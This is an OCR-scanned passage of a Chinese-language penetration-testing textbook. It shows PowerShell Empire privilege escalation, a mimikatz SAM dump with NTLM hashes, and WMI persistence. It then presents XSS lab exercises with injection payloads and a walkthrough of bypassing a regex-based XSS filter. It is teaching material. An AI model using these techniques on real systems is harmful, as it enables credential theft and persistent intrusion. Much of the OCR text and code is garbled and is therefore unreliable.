[>] Module is not opsec safe, run? [y/N] y 
(Empire: powershell/privesc/getsystem) » 

Running as: WORKGROUP\SYSTEM 


ILE LASYSTEM 4 3511. PJ box EVE. BRAT AIP 2B PowerSploitlh] Prix 


的 一 样 ， 将 使 用 mimikatz， 执 行 credentials 下 的 mimikatz/sam 模 块 以 获取 SAM 转 储 : 


(Empire: powershell/privesc/getsystem) > usemodule powershell/ 
credentials/mimikatz/sam 

(Empire: powershell/credentials/mimikatz/sam) » execute 
(Empire: powershell/credentials/mimikatz/sam) » 

Job started: 4SCVZ] 

Hostname: DESKTOP-KRB3MSI / 
0-1-3-21-392991984A5—-407/749833395—35314 702914 


EIiiizJ mimikatz 2.1 (x64) built on Dec 11 2016 18:05:17 
-#4 ^ ##. "A La Vie, A L'Amour" 
Ht / \ ## /[ * * 
414 \ / ## Benjamin DELPY '"gentilkiwi' ( benjamin@gentilkiwi.com ) 
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 
"HHH | with 20 modules * * */ 


mimikatz(powershell) # token::elevate 
Token Id : 0 
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User name 


SID name : NT AUTHORITY\SYSTEM 


604 34207 NT AUTHORITY\SYSTEM nee ae el Be (04g, 21p) 

Primary 

-> Impersonated ! 

* Process Token : 1172717 DESKTOP-KRB3MSI\User 
S-1-5-21-3929919845-4074983535-3314702914-1001 (18g,24p) Primary 
* Thread Token : 1203177 NT AUTHORITYNSYSTEM S-1-5-18 (04g,21p) 


Impersonation (Delegation) 


mimikatz(powershell) # lsadump::sam 
DESKTOP-KRB3MSI 


Domain : 
: a34b3d05aec244baf6e966715bd6b6c9 


oysKey : 


Local SID 5—-1—5-21-3929919845-4074983535-3314702914 
SAMKey : cb8862ecafc/19e1cc72£3309745d07a 
RID : 000001f4 (500) 

User : Administrator 

LM : 

NTLM : 

RID : O000001f5 (501) 

User : Guest 

LM E 

NTLM : 

RID : 000001f/ (303) 

User : DefaultAccount 

LM = 

NTLM : 

RID : 000003e9 (1001) 

User : User 

LM s 

NTLM : 64f12cddaa88057e06a81b54e73b949b 


现在 ， 己 经 有 了 可 用 于 攻击 的 NTLM 哈 希 。 下 一 步 是 添加 持续 化 访问 ， 以 便 重 
启 时 重新 连接 。 与 PowerSploit 相 比 ， 这 在 Empire 中 更 容易 完成 。 只 需要 执行 持续 化 
模块 


(Empire: powershell/credentials/mimikatz/sam) > 
usemodule powershell/persistence/elevated/wmi 
(Empire: powershell/persistence/elevated/wmi) > set Listener http 
(Empire: powershell/persistence/elevated/wmi) » execute 
[>] Module is not opsec safe, run? [y/N] y 
(Empire: powershell/persistence/elevated/wmi) » 
WMI persistence established using listener http with OnStartup WMI 
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subsubscription trigger. 


这 样 就 通过 WMI 实 现 了 持续 访问 。 现 在 , BY LA HJR Windows box, 并 返回 到 shell。 
155 本草 小 结 


PowerShell 是 Windows 系 统 上 最 强大 的 工具 之 一 。 本 章 分 析 运 行 PowerShell 脚 本 
时 的 不 同安 全 限制 ， 还 分 析 了 如 何 使 用 各 种 不 同 的 技术 来 经 过 这 些 限 制 。 一 旦 经 过 
这 些 限制 ， 大 门 就 已 经 局 开 ， 渗 透 测试 人 员 将 可 以 使 用 PowerSploit 和 Empire 等 其 他 
框架 。 利 用 这 些 工 具 ， 可 进一步 访问 系统 ， 实 现 持续 访问 ， 并 盗 急 数据 。 

通过 这 些 技术 ， 渗 透 测 试 人 员 可 利用 现 有 资源 ( 即 目 标 系统 上 的 已 有 资源 )， 而 
不 需要 额外 的 二 进 制 文件 。 由 于 一 些 页 面 会 被 网 络 东 毒 软件 捕获 ， 本 章 分 析 了 如 何 
避 开 签名 检查 ， 从 而 可 以 执行 代码 。 本 草 最 后 讲述 如 何 通 过 代理 ， 在 车 局 时 实现 持 
续 访 问 ; 介绍 如 何 利 用 各 种 工具 来 维持 对 目标 系统 的 访问 ， 收 集 和 盗 鳃 数据 。 
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7 71a] JA c 


本 书 上 一 版 介绍 了 Web 应 用 程序 漏洞 攻击 技术 ， 网 上 关于 这 方面 的 介绍 也 浩 如 
烟 海 。 但 一 些 更 局 级 的 技术 较 难 擎 握 ， 因 此 本 章 将 介绍 近年 来 发 生 的 一 些 被 大 量 报 
道 的 攻击 技术 。 本 章 将 对 这 些 撤 术 进 行 深 入 分 析 ， 市 你 更 好 地 理解 下 一 代 Web 应 用 
程序 漏洞 攻击 技术 。 


本 章 涵 兰 的 主题 如 下 : 

e XSS 演 化 史 

e JERII] 

e Padding Oracle Attack 


16.1 XSS 演 化 史 


跨 站 脚本 攻击 (XSS) 是 当今 人 们 误解 最 深 的 Web 漏 洞 。 如 果 东 人 提交 不 是 预期 输 
入 的 代码 ， 或 在 浏览 器 中 更 改 Web 应 用 程序 的 行为 ， 就 会 发 生 XSS。 历 史上 ， 攻 击 
者 在 发 动 钓鱼 攻击 和 会 话 鳃 取 攻 击 时 ， 己 经 使 用 了 这 种 漏洞 。 随 看 应 用 程序 m 
末 ， 原 本 可 用 于 旧 应 用 程序 的 一 些 攻 击 已 经 失效 。 但 是 ， 攻 守 双 方 在 进行 一 场 “ 道 
高 一 尺 ， 魔 高 一 丈 ” 般 的 缠 斗 ，XSS 存 活 了 下 来 ， 而 且 变 得 更 加 复杂 。 

传统 上 ， 通 过 一 个 简单 的 警告 对 话 框 (这 表明 代码 在 运行 ) 来 指示 此 类 漏洞 。 这 
些 演示 相当 友善 ， 因 此 很 多 组 织 并 不 了 解 XSS 市 来 的 影响 。 通 过 使 用 浏览 右 攻 击 框 
/ (Browser Exploitation Framework, BeEFP) 和 一 些 更 复杂 的 代码 , XSS 可 攻击 浏览 
次 多 数据 、 发 动 拒绝 服务 攻击 ， 等 等 。 有 人 使 用 浏览 器 进行 加 密 货 币 的 挖 矿 ， 所 有 

这 些 都 可 通过 XSS 来 执行 。 

了 解 XSS 的 一 些 历史 后 ， 下 耐看 几 个 实验 。 本 广 将 逐步 介绍 一 些 较 复 末 的 
XSS 示 例 ， 帮 助 你 更 深刻 地 理解 XSS 的 人 台 义 ， 以 及 在 当今 的 浏览 耸 中 如 何 与 其 进 
行 交 互 。 
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16.1.1 设置 环境 


本 章 将 使 用 64 位 Kali， 为 系统 分 配 至 少 4GB RAM. 我 们 已 经 有 了 所 需 的 大 多 数 
软件 ， 但 为 了 更 方便 地 使 用 环境 ， 我 们 将 安装 开 友 工具 Docker， 以 便 更 快速 地 部 车 
环境 ( 关 似 运行 虚拟 机 一 样 )。 这 里 将 使 用 本 书 GitHub 存 储 库 中 Chapter 16 区 的 多 个 
文件 。 

首先 克隆 本 书 的 GitHub 存 储 库 。 现 在 需要 设置 Docker;， Alt, WRAL apne 
行 Chapter 16 区 的 setup_dockersh 程 序 ， 在 给 Kali 深 加 所 需 的 存储 库 后 安装 所 需 的 包 ， 
此 后 配置 Docker 以 便 在 车 局 时 局 动 。 这 样 一 来 ， 只 需要 在 局 动 或 停止 实例 时 处 理 
Docker 机 制 ， 而 不 必 在 重 局 时 人 处理。 一 旦 完成 脚本 ， 就 安装 好 一 切 ， 可 以 继续 了 。 

Jj 3€ Google Chrome, "J M Kali} it 28 UJ [4] https://www.google.com/chrome/ 
browser/， 下 载 .deb 包 。 按 如 下 方式 安装 Google Chrome: 


# dpkg -1i google-chrome-stable current amd64.deb 

Selecting previously unselected package google-chrome-stable. 
(Reading database ... 351980 files and directories currently 
installed.) 

Preparing to unpack google-chrome-stable current amd64.deb ... 
Unpacking google-chrome-stable (61.0.3163.100-1) 


X ”注意 : 如 果 在 安装 Google Chrome 时 遇 到 错误 ， 这 可 能 是 依赖 问题 。 要 解决 
SS 这 个 问题 ， 可 运行 apt --fix-broken install A, ZR LEKI. me, A 
成 功 地 安装 Google Chrome. 


接 下 来 ， 需 要 构建 网 站 的 Docker 镜 像 ( 用 于 本 章 的 XSS 部 分 )。 从 Chapter 16 区 的 
GitHub 存 储 库 运行 cd 命令 ， 进 入 XSS 目 录 ， 创 建 Docker 镜 像 并 运行 ， 如 下 所 示 : 


root@kali:~/Ch16# cd XSS 

root@kali:~/Ch16/XSS# docker build -t xss . 
Sending build context to Docker daemon 3.393MB 
Step 1/2 : FROM nimmis/apache-php5 

---> 862dcaafdb11 

Step 2/2 : ENV DEBIAN FRONTEND noninteractive 
——-> Using cache 

——» 47a723405265 

Successfully built 47a723405265 

Successfully tagged xss:latest 


现在 ， 运 行 Docker: 


root@kali:~/Ch16/XSS# docker run -p 80:80 -ti xss 
*** open logfile 

*** Run files in /etc/my runonce/ 

«snipped for brevity> 

*** Started processes via Supervisor... : 
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apache2 RUNNING pid 17, uptime 0:00:04 
crond RUNNING pid 16, uptime 0:00:04 
syslog-ng RUNNING pid 15, uptime 0:00:04 


可 以 看 到 ，VM 正 在 运行 ， 而 且 apache2 已 经 局 动 。 我 们 尽 可 将 这 个 窗口 移动 到 
适当 人 位置， 继续 完成 下 面 的 实验 。 


16.1.2 实验 16-1: im2]XSS 


第 一 个 实验 将 帮助 你 温习 XSS 的 工作 原理 。XSS 实 质 上 是 注入 攻击 。 这 里 将 代 
码 注入 网 页 ， 并 由 浏览 右 显 示 。 浏 贞 郑 为 什么 会 显示 代码 ? 在 很 多 XSS 情 形 中 ， 合 
法 代码 结束 以 及 攻击 代码 开始 的 界线 并 不 清晰 。 因 此 , 浏览 器 继续 完成 日 己 的 任务 ， 
显示 出 XSS 代 码 。 

这 个 实验 将 站 先 使 用 Firefox。 截 到 本 书 撰 与 时 ， 最 新 版 本 是 Firefox 56. WRIX 
下 面 的 说 明 执 行 操 作 时 遇 到 问题 ， 或 者 觉得 说 明 不 够 完整 ， 可 使 用 Firefox 的 早期 

访问 http:/localhosyexample1.html， 可 看 到 如 图 16-1 所 示 的 表单 。 这 个 简单 的 表 
单 页 面 要 求 输入 一 些 基 本 信息 ， 然 后 将 数据 友 送 到 PHP 页 面 来 处 理 绪 果 。 


Most Visitedy [iJ Offensive Security ™ Kali Linux Kali Docs ™ Kali Tools & Exploit-DB W Aircrack-ng af Kali Forums “4 NetHunter 
Registration Form 


Full Name 


Full Name 


Last Name, First Name, eg.: Smith, John 
Address 


Full Name 


eg: 123 Valentine Ct. 


Country 


Afghanistan | 


图 16-1 用 于 实验 16-1 的 表单 


首先 放 入 一 些 普通 数据 。 输 入 名 称 asdf 和 地 址 fdsa， 单 击 Register。 你 将 看 到 如 
Pile Dy: 

You put in the data: 

asdf 


fdsa 
Afghanistan 


ROP REA TE, WEA Ee EERE TAB A AE 
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用 asdf<"0O=>asdf 等 字符 串 并 单 击 Register， 预 计 应 用 程序 会 将 该 数据 编码 为 HIML 
友好 格式 ， 然 后 返回 。 如 果 不 是 这 样 ， 我 们 就 有 机 会 进行 代码 注入 。 

使 用 前 面 的 字符 串 ， 在 Full Name 和 Address 字 上 段 中 进行 尝试 。 应 当 看 到 以 下 
Uf] JW] : 

You put in the data: 

asdf<'"()=>asdf 

asdf<'"()=>asd£ 

Afghanistan 

浏览 器 返回 了 输入 的 字符 串 ， 但 这 只 是 一 部 分 。 通 第 情况 下 ， 表 面 看 来 一 切 正 
弟 ， 但 当 查 看 页面 的 HTML 源 代码 时 ， 会 发 现 人 不同 的 细 市 。 在 Firefox 窗 口中 ， 按 下 
CtritU 来 显示 页 面 的 源 代码 。 浏 览 源 代码 ， 会 看 到 以 下 内 容 : 

<HTML><BODY> 

<PRE> 

You put in the data: 

asdf<'"()=>asdf 

asdfc«'"()-»asdf 

Afghanistan 

«/PRE» 

«/BODY» 

</HTML> 

可 以 看 到 ， 没 有 任何 一 个 字符 被 转 义 。 相 反 ， 将 字符 串 直 接 写 回 HTML 文档 主 
fk. XX San ae 是 可 注入 的 。 在 结构 民 好 的 应 用 程序 中 ，< 和 > 字符 应 当 分 别 
转换 为 &gt; 和 &lt;。 这 是 因为 HTML 标 记 使 用 这 些 字 答 ， 如 果 不 进行 过 小 ， 我 们 就 有 
机 会 放 入 目 pele 

看 起 来 页 面 可 以 注入 HTML 代码， 下 一 步 是 符 试 完成 一 个 示例 。 你 马上 就 能 看 
到 注入 啊 应 的 一 个 简单 示例 是 弹出 一 个 警告 框 。 在 这 个 示例 中 ， 在 Full Name 字 段 中 
输 iia A 如 果 成 功 的 话 ， 将 弹出 一 个 警告 枉 ， 其 中 显示 1。 就 像 
在 Full Name 字 段 中 输入 字符 串 一 样 ， 也 可 在 Address 字 段 中 输入 任意 字符 串 。 单 击 
Register， 将 弹出 如 图 16-2 所 示 的 警告 杠 。 

大 功 告 成 ! 在 Firefox 中 效果 不 错 , Firefox 开 发 者 并 未 投入 大 量 精力 通过 创建 XSS 
过 滤 需 来 保护 用 户 。 但 IEUnternet Explorer) fU Chrome G A WER» FY ARIN Hea 
简单 的 XSS 技 术 ， 并 加 以 阻止 ， 以 免 影响 用 户 。 要 运行 Chrome， 输 入 以 下 代码 : 


# google-chrome --no-sandbox 


第 16 章 下 一 代 Web 应 用 程序 漏洞 攻击 


(€)@|localhost/examplelphp |x qQ Search | » — 


Ex Most Visited» [Offensive Security ™ Kali Linux ™ Kali Docs ™ Kali Tools » 


Transferring data from localhost... 


图 16-2 ”成 功 后 显示 的 警告 杠 


因为 Chrome 为 保护 系统 而 不 允许 以 根 用 户 身 份 运 行 浏览 磺 ,， 所 以 我 们 必须 添加 
--n0-Sandbox 指 令 。 在 Chrome 局 动 时 单 击 各 个 弹出 窗口 ， 再 次 莹 试 本 实验 中 的 步 又。 
此 次 看 到 的 啊 应 是 不 同 的 。 图 16-3 显 示 ，Chrome 已 经 阻止 了 这 个 简单 的 XSS 。 
y [5 localhost x Nun Mense dcs 
esc : 


Bs 


This page isn’t working 


Chrome detected unusual code on this page and blocked it to protect your personal information 
(for example, passwords, phone numbers, and credit cards). 


Try visiting the site's homepage. 


ERR BLOCKED BY X55 AUDITOR i ———————— 


16-3 Chrome CHIE fix fa] FK HJXSS 


JEER, 16-3 "P S o AY Ae EB ES] A aR, TH RIE RR EB AH RS 
ERR BLOCKED BY XSS AUDITOR。Chrome 可 利用 XSS Auditor 功 能 阻止 XSS， 
保护 用 户 。 虽 然 这 个 示例 无 法 工作 ， 但 可 通过 多 种 方式 执行 XSS 攻 击 。 在 下 面 的 实 
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验 中 ， 将 循序 渐进 地 介绍 一 些 更 复杂 的 示例 ， 并 分 析 相 应 的 规避 技术 。 
16.1.3 ”实验 16-2: XSS 规 避 |Internet 防 线 


很 多 人 在 了 解 到 第 一 个 XSS 漏 洞 时 ， 都 会 访问 Intermet 来 了 解 有 头 如 何 防御 XSS 
攻击 的 信息 。 对 我 们 而 言 ， 壮 运 的 是 ， 这 些 建议 通 冰 都 是 不 完整 的 。 对 于 应 用 程序 
所 有 者 而 言 这 是 一 个 坏 消 轧 ， 但 对 我 们 而 言 却 是 喜讯 。 通 过 这 个 实验 ， 将 分 析 采 用 
了 一 些 基 本 保护 指 施 的 页 面 。 

EEA ERO AE ATI X. PHPF, Whe htmlspecialcharsPR B56 KH « 
该 函数 接收 不 安全 的 HTML 字符， 转换 为 适当 的 编码 形式 后 显示 出 来 。 首 先 看 看 这 
个 新 环境 如 何 处 理 前 一 个 实验 中 的 标记 。 

在 Firefox 中 转 到 http://localhost/example2.php， 将 看 到 类 似 于 前 一 个 实验 中 的 表 
单 。 要 了 解 应 用 程序 行为 ， 需 要 看 到 什么 是 成 功 的 结果 。 输 入 asdf 作为 名 称 ， 输 入 
fdsa 作 为 地 址 ， 然 后 单 击 Register。 你 将 看 到 以 下 输出 : 

You entered 

asdf 

fdsa 

United States of America 

这 符合 预期 。 尝 试 前 面 的 标记 时 ， 会 看 到 一 个 警告 框 。 看 一 下 现在 的 情形 是 什 
么 样 的 。 在 名 称 和 地 址 文本 框 中 输入 asdf<"O=>asdf 后 提交 页 面 。 图 16-4 显 示 ， 返 回 
的 页 面 及 生 了 明显 变化 。 第 一 个 变化 是 : 输入 示例 显示 为 粗 体 。 第 二 个 变化 是 : 我 
们 提交 的 数据 只 有 一 部 分 锌 填充 到 文档 中 。 


€ 0 localhost/example2.php 


© [IA Search IABB & f$ 
£j Most Visited’ [J Offensive Security " Kali Linux ‘Ñ, Kali Docs ™ Kali Tools  Exploit-DB Wy Aircrack-ng 加 Kali Forums 
Registration Form 


Full Name 


asdf< 
Last Name, First Name, eg.: Smith, John 
Address 

asdf< 
eg: 123 Valentine Ct. 


Country 


United States of America 7 


Kl16-A ”在 Firefox 中 ， 提 交 上 有 具有 XSS 标 记 的 页 面 
要 了 解 所 发 生 的 事情 ， 再 次 按 下 CtritU 来 查看 源 代码 。 在 源 代码 中 查找 输入 数 
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据 的 位 置 。 因 此 ， 使 用 CtrlHF 搜 索 短 语 asdf， 将 看 到 如 下 文本 : 


<DIV class-" col-sm-»" > 
<INPUT type="text" id-"name" name="name" placeholder- 
'asdf&lt;'&quot; ()=&gt;asdf' class-"form-control" autofocus=""> 
<SPAN class= 
"help-block"><B>Last 
Name, First Name, eg.: Smith, John</SPAN> 

ADB, RPAH HEPAT AE STEM. >F <P AUR SS RARAN 
HIM 代 码 显示 出 来 。 一 些 情 况 下 ， 这 种 方法 足以 阻止 攻击 者 ， 但 此 处 ， 有 一 个 字符 
串 未 被 过 滤 ， 那 就 是 单 引 号 0)。 分 析 代 码 可 看 到 ，INPUT 框 的 占 位 符 字段 也 使 用 单 
引号 。 这 束 征 我 们 的 数据 在 输出 中 被 缩短 的 原因 。 

要 对 这 个 页 面 肥 起 攻击 ， 我 们 必须 想 出 一 个 新 办 法 ， 不 使 用 HIML 标 记 和 双 引 
号 注入 代码 ， 设 法 让 浏览 器 显示 出 来 。 占 位 符 使 用 了 单 引 号 ， 通 过 这 一 点 可 想到 ， 
或 许可 修改 输入 字段 来 运行 代码 。 为 此 ,最 常用 的 做 法 是 使 用 事件 。 在 加 载 文 档 时 ， 
在 文档 中 的 不 同位 置 触 发 多 个 事件 。 

对 于 INPUT 字 段 而 言 ， 可 用 的 事件 数量 要 少 得 多 ; 在 这 里 ， 有 三 个 事件 会 有 帮 
Hj: onChange、onFocus 和 onBlur。 当 输入 框 中 的 值 发 生变 化 时 ， 触 发 onChange。 当 
选中 字段 和 离开 字段 时 ， 分 别 触 上 友 onFocus 和 onBlur。 在 下 一 个 示例 中 ， 使 用 onBlur 
执行 警告 消息 。 

在 名 称 文本 框 中 输入 ' onFocus='alert(1)， 输 入 地 址 类 型 asdf。 单 击 Resgister 时 ， 会 
显示 在 表单 中 提交 的 内 容 。 这 并 非 我 们 想 要 的 , 但 可 用 于 了 解 输入 是 任 发 生 了 变化 : 
You entered<BR>' onFocus='alert (1)<BR>asdf<BR>United States of 

America<BR> 

全 入 完全 没有 变化 ， 因 此 ， 如 果 添加 另 一 个 元 素 ， 上 述 代码 是 可 行 的 。 此 次 为 
Full Name 字 段 使 用 同 前 面 一 样 的 输入 ， 为 Address 字 段 使 用 >asdf( 而 非 asd0 。 单 击 
Register 时 可 以 看 到 ， 弹 出 的 警告 框 显示 数字 1。 单 击 OK， 分 析 文 档 源 中 的 代码 ， 搜 
索 alert。 

<INPUT type-"text" id-"name" name="name" placeholder= 

'" onFocus-'alert(1)' class-"form-control" autofocus=""> 

«SPAN class- 

"help-block"»Last 

Name, First Name, eg.: Smith, John</SPAN> 

可 以 看 到 ,此 处 使 用 的 单 引号 关闭 了 占 位 符 字段 ,在 onFocus 输 入 块 中 创建 了 一 
个 新 文件 。 SHIA Ae Bate, Ua a BIAS Ss. 我 们 的 字符 串 并 未 使 用 闭 引 号 ， 
但 这 是 占 位 符 初始 字段 的 一 部 分 ， 我 们 为 字符 串 退 加 了 一 个 单 引 写 。 如 果 我 们 已 经 
在 字符 串 的 末尾 加 了 一 个 单 引号 , 在 显示 时 将 成 为 无 效 的 HTML, 代码 将 无 法 执行 。 
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看 一 下 Chrome 中 的 情形 。 提 交 相 同 的 值 时 ， 输 入 又 被 XSS AuditorBH iE. RATA 
中 发 现 了 趋势 。 虽然 Chrome 用 户 受 到 保护 , 但 使 用 其 他 浏览 右 的 用 尸 可 能 未 受 保护 ， 
因此 ， 在 Firefox 等 权限 客 松 的 浏览 右 中 进行 测试 可 帮助 我 们 成 功 地 识别 漏洞 。 


16.1.4 实验 16-3: 使 用 XSS 更 改 应 用 程序 逻辑 


在 上 一 个 实验 中 ， 了 网 页 十 分 简单 。 现 代 Web 应 用 程序 大 量 使 用 JavaScript 代 全， 
会 在 页 面 本 导 ( 而 非 后 端 ) 租 入 大 量 应 用 程序 馆 辑 。 这 些 页 面 使 用 异步 JavaScript 
(Asynchronous JavaScript，AJAX) 之 关 的 技术 提交 数据 。 通 过 操纵 文档 对 象 模 型 
(Document Object Model, DOM; 也 束 是 Web 浏 览 颖 中 用 于 定义 文档 的 对 象 ) 中 的 区 

这 意味 看 ， 可 以 添加 新 的 对 话 框 ， 刷 新 页 面 内 容 ， 公 开 不 同 的 层 ， 等 等 。 对 于 
转移 到 Web 的 二 进 制 应 用 程序 而 言 ， 基 于 Web 的 应 用 程序 正在 成 为 默认 格式 。 要 求 
网 站 功能 完备 的 趋势 产生 了 大 量 可 利用 的 漏 铜 。 本 实验 将 要 分 析 的 应 用 程序 使 用 
jQuery( 一 个 流行 的 JavaScript 库 ) 与 后 端 服务 进行 交互 。 

在 本 实验 中 ， 使 用 Firefox 加 载 页 面 http:/Wlocalhosyexample3.html。 访 页面 看 起 来 
是 正 钊 的 ， 但 当 我 们 提交 数据 时 ， 并 未 发 送 到 提交 页 面 ， 而 是 弹出 一 个 实 口 显示 提 
交 信 息 和 状态 。 与 前 面 一 样 ， 符 试 为 名 称 和 地 址 分 别 使 用 值 asdf 和 fasa。 图 16-5 显 示 
了 输出 结果 。 


€ | localhost/example3.html E ||Q. Search we + j£ 


£y Most Visited» {J Offensive Security ™ Kali Linux "& Kali Docs ‘Ñ, Kali Tools ® Exploit-DB W Aircrack-ng p Kali 


Success 


Your registration of asdf 
fdsa 

Afghanistan 

was successful. 


图 16-5 ”成功 提交 
现 将 名 称 更 改 为 标记 asd 作 "(==>asdf， 地 址 仍 为 fdsa。 提 交 这 些 值 时 ， 将 看 到 出 
AA. PIM BBE, (ASIP AER UIE, AA RIN SHA RZ 
据 。 像 上 个 实验 那样 查看 页 和 面 的 源 代码 ， 在 其 中 根本 看 不 到 标记 。 
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原因 是 该 幢 面 已 被 JavaScript 修 改 ， 因 此 我 们 输入 的 内 容 不 会 作为 源 代码 的 一 部 
分 被 加 载 。 相 反 ， 会 被 添加 到 DOM 中 。 半 憾 的 是 ， 我 们 无 法 利用 以 前 的 招数 来 确定 
该 忠 面 是 人 否 和 存在 漏洞 ， 因 此 必须 使 用 一 种 新 工具 。 

Firefox 内 置 了 一 组 开 肥 工具 ， 可 玫 助 我 们 分 析 当 前 显示 的 文档 正在 做 什么 。 要 
获取 该 工具 ， 可 按 下 Ctrl+ShifttI。 窗 口感 部 将 出 现 一 个 新 的 窗 格 ， 其 中 包含 多 个 迁 
项 卡 。 可 利用 Inspector 选 项 卡 查 看 显示 的 HIML 代 码 。 单 击 该 选项 卡 , 然后 使 用 Ctrl+F 
查找 字符 串 asdf。 图 16-6 在 开 友 者 工具 的 Inspector 饮 项 卡 中 旺 示 了 代码 。 


( € ) © | localhost/example3.html v | C [[Q Search 


f Most Visitedw [§Offensive Security “Kali Linux ‘Ñ, Kali Docs ™ Kali Tools  Exploit-DB Aircrack-ng a Ka 


Failure! 


Your registration of asdf< (=>asdf 
fdsa 

Afghanistan 

was a failure. 


Close 


E |) inspe... o Cons.. © Debug... {} Style E. © Perform.. 4k Mem.. 三 Netw. SD. Ede B H 


+ PIE EN A Computed | Anima 


block; padding-left: 1l4px;"> @ ^ Filter Styles 
w<div class-"modal-dialog" role="document"> £m 
* «liv class="modal-content"> 
«div id-"my-header" classz"modal-header"»Failure!«/div» 
+div id="my-msgbox" classz"modal-body"» 
Your registration of asdf<'"()=>asdf 
<br 


Afghanistan 
«br» 


图 16-6 ”在 开发 者 工具 中 查看 代码 


看 起 来 ， 我 们 的 字符 串 像 是 未 经 修改 能 入 对 话 杠 中 。 这 相当 不 错 ， 实 验 16-1 中 
的 技巧 也 可 用 于 此 处 。 像 实验 16-1 中 那样 , 在 名 称 字段 中 使 用 <scripf>alert(1)</scrip 伺 。 
提交 这 个 值 时 , 会 看 到 一 个 包含 1 的 警告 框 , 源 代 码 正确 运行 。 当 我 们 关闭 警告 框 时 
看 到 了 出 错 消 息 ， 于 是 返回 Inspection 选 项 卡 ， 答 找 alert， 可 在 显示 的 HIML 源 代码 
中 清楚 地 看 到 它 。 

实施 新 技术 时 ， 经 常 未 考虑 好 如 何 处 理 以 前 的 故障 ， 因 此 在 新 技术 中 会 重复 出 
现 旧 有 漏洞 。 要 分 析 这 种 攻击 在 Chrome 中 的 效果 ， 可 再 次 使 用 相同 的 输入 。 

在 Chrome 中 运行 此 攻击 时 ， 会 看 到 如 图 16-7 所 示 的 警告 枉 ， 显 示 我 们 的 代码 正 
在 运行 。XSS Auditori Riv A R MIR, (ASAIN AAU A Ste. BTA 
在 两 种 浏览 项 中 显示 十 分 简单 的 XSS 字 符 串 。 这 突出 了 一 个 事实 : 在 一 种 浏览 器 中 
采用 一 种 约束 方式 来 阻止 页 面 攻 击 时 ， 其 他 浏览 右 仍 可 能 存在 漏洞 ， 可 使 用 规避 
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(Evasiom) 技 术 来 经 过 过 滤 技 术 。 这 也 从 万 一 个 角度 说 明 , 如 条 知 趾 一 个 页 面 易 受 XSS 
的 攻击 ， 则 修复 它 ; 不 要 完全 依靠 浏览 需 来 保证 用 户 的 安全 。 


> CG [o localhost/example3.html 


Registrat localhost says: 


Full Name 1 


«script»alert(; 


Last Name, Firs’ 
Address 


asdf 


eg: 123 Valentine Ct. 
Country 


Afghanistan 


图 16-7 在 Chrome 中 探 完 example3.html 
16.1.5 ”实验 16-4: 为 XSS 使 用 DOM 


在 前 面 的 实验 中 ， 我 们 使 用 一 些 十 分 简单 的 技术 来 执行 XSS。 但 对 于 更 安全 的 
应 用 程序 而 言 ， 通 常 更 难 绕 过 其 安全 防线 。 这 个 实验 将 分 析 同 一 个 应 用 程序 ， 但 该 
应 用 程序 包含 其 他 检查 措施 和 对 策 。 网 页 通 音 都 包含 数据 验证 函数 ， 我 们 可 通过 三 
种 方式 经 过 它们 : 通过 修改 代码 来 删除 检 奏 功能 ， 不 经 过 JavaScript 直 接 提交 到 目标 
页 面 ， 设 计 出 绕 过 代码 的 方式 。 下 面 讨论 如 何 使 用 XSS 避 开 过 滤器 。 

站 先 针 对 http://localhost/example4.html 页 面 和 尝试 前 面 实验 中 用 过 的 技术 。 在 
Firefox 中 加 载 该 页 面 时 ， 初 看 起 来 是 普通 页 面 ， 我 们 需要 分 析 一 下 这 个 新 版 本 中 有 
哪些 成 功 情形 和 错误 情形 。 要 了 解 成 功 条 件 ， 再 次 输入 asdf 和 fdqsa。 单 击 Register 时 ， 
将 看 到 成 功 消 息 ， 指 示 我 们 和 输入 的 内 容 是 合法 的 。 现 在 答 试 将 script 标 记 放 入 Full 
Name 字 段 。 在 名 称 字 段 中 输入 <scripf>， 在 地 址 字段 中 输入 fdsa。 现 在 应 当 看 到 了 错 
误 情 形 。 要 注意 研究 铅 误 消 息 ， 我 们 将 据 此 在 JavaScript 中 探 守 是 如 何 到 达 此 处 的 。 
为 此 ， 在 Firefox 中 按 下 CtrlHU 打 开源 代码 ， 然 后 搜索 短语 Please Try， 下 面 是 返回 的 
代码 块 : 

$ ("#registerForm") .submit (function (event) { 

Qevent .preventDefault () ; 


var data = { }; 

data = $(this).serialize() ; 

Qvar arr = $ (this) .serializeArray(); 
for (var i = 0; i < arr.length; i++) 

{ 
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Qi*t (checkxSS (arr[il.value))( 
$ ("#my-msgbox") .html ("Invalid input, found XSS<BR>Please Try 
again"); 
j $ ("#my-header") .html ("ERROR!!!!"); 
x$ ('#success-modal') .modal ('toggle'); 
return false; 
} 
} 
包含 所 找到 错误 的 代码 块 是 jQuery 事件 的 一 部 分 , 提交 表单 时 会 触发 这 一 事件 。 
函数 的 第 一 行 阻止 表单 正常 提交 ， 这 意味 着 由 该 函数 处 理 表 单数 据 的 提交 。 接 下 来 
可 看 到 ， 提 区 的 数据 被 转换 为 数组 。 使 用 这 个 数组 友 代 表单 中 提交 的 每 一 项 。 
针对 数组 中 的 每 一 项 运行 checkXSS 图 数 ， 如 果 返 回 tue， 则 显示 错误 消息 。 消 
妃 框 的 标题 和 正文 将 被 更 新 ， 消 息 框 被 打开 。 这 明显 就 是 导致 包含 销 误 的 弹出 框 的 
代码 。 TERE, 不 知道 checkXSS 如 何 评 佑 我 们 输入 的 内 容 , 因此 接 下 来 进行 分 析 。 
在 代码 中 搜索 checkXSS 时 ， 找 到 代码 块 的 函数 定义 : 


function checkXSS (val) 


{ 
Ovar regexes = [ 
zfalert\(/, 
/eval\(/, 
/fromCharCode/, 
/onChange/, 
/onFocus/, 
[5.2 v iz 
for (var 1 = 0; 1 < regexes.length; i++) 
{ 
if (val.match(regexes[i])) 
{ 
return true; 
} 
} 
return false; 
} 


checkXSS PRAY 1E ZSASUN Ze, FAT eer. Fa ES 
NE, {Halertehi ZU g PH IE. FRM ACIAYEAHTMLinic, AAD <ak> eerste 
的 内 容 都 被 阻塞 。 因 此 ， 当 提交 数据 时 ， 会 检查 其 中 的 每 个 正则 表达 式 ， 如 采 人 存在 
匹配 ， 束 返回 true。 该 函数 的 作者 尝试 阻止 大 多 数 有 影响 力 的 JavaScript 隙 数 和 HTML 
标记 。 

Qu St RP e? 有 必要 看 一 下 屏幕 上 显示 的 成 功 消 息 。 理 解 字符 串 的 构建 方 
式 有 助 于 确定 如 何 绕 过 其 中 一 些 保护 。 
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$.ajax(( 

type: "POST", 

dataType: "json", 

url: "example3.php", 

data: data, 

success: function(data) { 

Qvar string = "Your registration of " + 

